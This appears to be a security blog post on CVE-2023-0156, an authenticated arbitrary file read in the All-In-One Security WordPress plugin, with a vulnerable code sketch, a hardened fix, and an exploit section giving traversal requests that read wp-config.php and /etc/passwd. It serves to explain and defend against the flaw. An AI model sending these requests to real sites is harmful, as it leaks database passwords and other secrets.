Summary:  
CVE-2023-0156 is a major security issue discovered in the popular All-In-One Security (AIOS) WordPress plugin, affecting versions before 5.1.5. This vulnerability allows an authorized user (admin and above) to read any file, and even browse directories, anywhere on the server that the web server account can access. While the plugin will only display the last 50 lines of any chosen file, this is still a significant leak, especially for sensitive files like wp-config.php or /etc/passwd. This post explains how the vulnerability works, includes code snippets, and demonstrates how an attacker can exploit it.

What is All-In-One Security (AIOS)?

All-In-One Security (AIOS) is a widely used WordPress plugin that helps site owners secure their websites with a collection of features, including login lockdowns, firewall options, and log viewing.

- Official site: https://aiosecurity.com
- WordPress plugin page: https://wordpress.org/plugins/all-in-one-wp-security-and-firewall/

The Problem

In the way AIOS exposes log files for review, there is no restriction on which files an admin-level user can view. The file path is taken from a user-provided parameter and is not limited to the plugin's or WordPress's own log files. As a result, anyone with sufficient privileges (usually administrators or higher) can ask the plugin to display any file the web server can read. The output is truncated to the last 50 lines, but files like wp-config.php are often short enough for this to include everything.

Modifying the request (for example, using browser devtools or a tool like Burp Suite) to set the file name/path to /etc/passwd (Linux servers), wp-config.php, or even /var/www/html/.env is enough to read those files.

Here is a *simplified* and *pseudocode* example of what the issue looks like:

```php
<?php
// Inside the plugin's file view handling function (simplified sketch of the flaw).
// The path comes straight from the request: no allow-list, no directory containment.
$file_to_read = $_REQUEST['log_file'];
if (file_exists($file_to_read)) {
    $lines = file($file_to_read);              // Loads file into array, one item per line
    $lines_to_show = array_slice($lines, -50); // Only show last 50 lines
    foreach ($lines_to_show as $line) {
        echo htmlspecialchars($line) . "\n";
    }
} else {
    echo "File not found.";
}
```

The missing step:
There is NO check that $file_to_read points to a log file inside an expected directory. A user could supply ../../../wp-config.php or /etc/passwd.
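A hardened version of that handler, as an added example (not the plugin's code or its actual patch): the log name is restricted to an allow-list of bare filenames inside one fixed directory, and the resolved path is re-checked with realpath() so neither "../" nor a symlink can escape it. LOG_DIR and ALLOWED_LOGS are assumed placeholder values.

```php
<?php
// Added example, not the plugin's code. LOG_DIR and ALLOWED_LOGS are assumed
// placeholders for the directory and files the viewer is meant to expose.
const LOG_DIR      = '/var/www/html/wp-content/aios-logs';
const ALLOWED_LOGS = ['firewall.log', 'login-lockdown.log', 'debug.log'];
const MAX_LINES    = 50;
// Map a user-supplied log name to a canonical path inside LOG_DIR, or null.
// Three independent checks: bare filename only, exact allow-list match, and a
// realpath() containment test so symlinks or "../" cannot escape LOG_DIR.
function resolve_log_path(string $requested): ?string
{
    // Reject paths ("/etc/passwd", "../wp-config.php") and NUL bytes outright.
    if ($requested === '' || $requested !== basename($requested) || strpos($requested, "\0") !== false) {
        return null;
    }
    // Allow-list by exact name; never try to deny-list "bad" strings.
    if (!in_array($requested, ALLOWED_LOGS, true)) {
        return null;
    }
    $base = realpath(LOG_DIR);
    $path = realpath(LOG_DIR . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null; // directory or log file does not exist
    }
    // Canonical path must sit strictly below the canonical log directory.
    if (strncmp($path, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return $path;
}
// Same "last 50 lines" behaviour as the vulnerable handler, but only for vetted
// paths. The plugin's admin-only capability check is assumed to run before this.
function render_log_tail(string $requested): void
{
    $path = resolve_log_path($requested);
    if ($path === null) {
        http_response_code(400);
        echo "Invalid log file.";
        return;
    }
    foreach (array_slice(file($path, FILE_IGNORE_NEW_LINES), -MAX_LINES) as $line) {
        echo htmlspecialchars($line, ENT_QUOTES, 'UTF-8') . "\n";
    }
}
// Traversal and absolute paths now resolve to null instead of a file on disk;
// 'firewall.log' yields a path only if that file really exists under LOG_DIR.
foreach (['../../../wp-config.php', '/etc/passwd', 'firewall.log'] as $name) {
    printf("%-25s => %s\n", $name, var_export(resolve_log_path($name), true));
}
```

The allow-list is the essential part; a deny-list of "../" or "/" would still be bypassable through encoding or symlinks, which is why the realpath() containment check is kept as a second, independent line of defence.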

How to Exploit CVE-2023-0156

Warning:  
This is for educational purposes only. Never test on servers you do not own or have explicit permission to audit.

1. Go to the plugin's Logs or Debug tools menu.
2. Intercept the network request made when selecting a log file, using your browser's developer tools (Network tab) or an intercepting proxy.
3. Change the file selection (or manually send a crafted POST/GET request) for the log file parameter, e.g.:

```http
POST /wp-admin/admin.php?page=aiowpsec_logs HTTP/1.1
Host: yoursite.com
...
log_file=../../../../wp-config.php
```

The response will include the last 50 lines of the chosen file.

Some log viewing interfaces may expect a full path, so you could try direct paths such as /etc/passwd.

Let's say you want to leak the database password from wp-config.php:

```http
GET /wp-admin/admin.php?page=aiowpsec_logs&log_file=../../wp-config.php HTTP/1.1
Host: vulnerable-target.com
Cookie: wordpress_logged_in=...
```

The response contains:

```php
<?php
define('DB_NAME', 'wordpress_db');
define('DB_USER', 'wpuser');
define('DB_PASSWORD', 'SuperSecretP@sswrd');
...
```

- Online shop: grab payment gateway secrets from config files
- Leak the list of server users (/etc/passwd), especially on badly configured servers

Only an authenticated user with at least admin privileges can use this. Even so, it is often combined with privilege escalation or phishing attacks: if the attacker gets admin, they now also get a file browser.

Patch Status

The flaw was fixed in version 5.1.5.  
- Official changelog
- Wordfence Advisory

Upgrade Now!  
If you use All-In-One Security, update to the latest version immediately!

Further Reading

- CVE-2023-0156 at NVD (National Vulnerability Database)
- Plugin Vulnerabilities Listing
- Patch Diff on GitHub (example)

Conclusion

CVE-2023-0156 is an example of how easily a helpful “view log file” feature can become a security risk if developers forget to validate input. Even though this issue is restricted to admins, it provides a dangerous file-read primitive that can help attackers escalate attacks or steal sensitive information.

Stay safe: Always keep your plugins updated, restrict admin access, and review log viewing features carefully!
*Have you updated your security plugins recently? Double-check today!*

Timeline

Published on: 04/10/2023 14:15:00 UTC
Last modified on: 04/14/2023 03:54:00 UTC